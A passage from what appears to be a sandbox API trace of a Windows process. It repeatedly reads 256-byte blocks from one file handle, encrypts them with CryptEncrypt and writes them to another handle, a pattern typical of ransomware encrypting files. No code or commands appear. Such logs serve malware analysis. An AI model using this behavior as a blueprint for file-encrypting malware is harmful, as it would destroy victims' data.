pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.398] GetLastError () returned 0x0 [0149.398] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.398] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.398] GetLastError () returned 0x0 [0149.398] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.398] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.398] GetLastError () returned 0x0 [0149.398] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.398] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.398] GetLastError () returned 0x0 [0149.398] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.398] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.399] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.399] GetLastError () returned 0x0 [0149.399] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.400] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.400] GetLastError () returned 0x0 [0149.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.400] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.400] GetLastError () returned 0x0 [0149.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.400] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.400] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.401] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.401] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.401] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.401] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.401] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.401] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.401] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.401] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.401] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.401] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.401] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.401] GetLastError () returned 0x0 [0149.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.402] GetLastError () returned 0x0 [0149.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.402] GetLastError () returned 0x0 [0149.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.402] GetLastError () returned 0x0 [0149.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.402] GetLastError () returned 0x0 [0149.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.402] GetLastError () returned 0x0 [0149.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.402] GetLastError () returned 0x0 [0149.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.402] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.403] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.403] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.403] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.403] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.403] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.403] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.403] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.403] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.403] GetLastError () returned 0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.404] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.404] GetLastError () returned 0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.404] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.404] GetLastError () returned 0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.404] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.404] GetLastError () returned 0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.404] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.404] GetLastError () returned 0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.404] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.404] GetLastError () returned 0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.404] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.404] GetLastError () returned 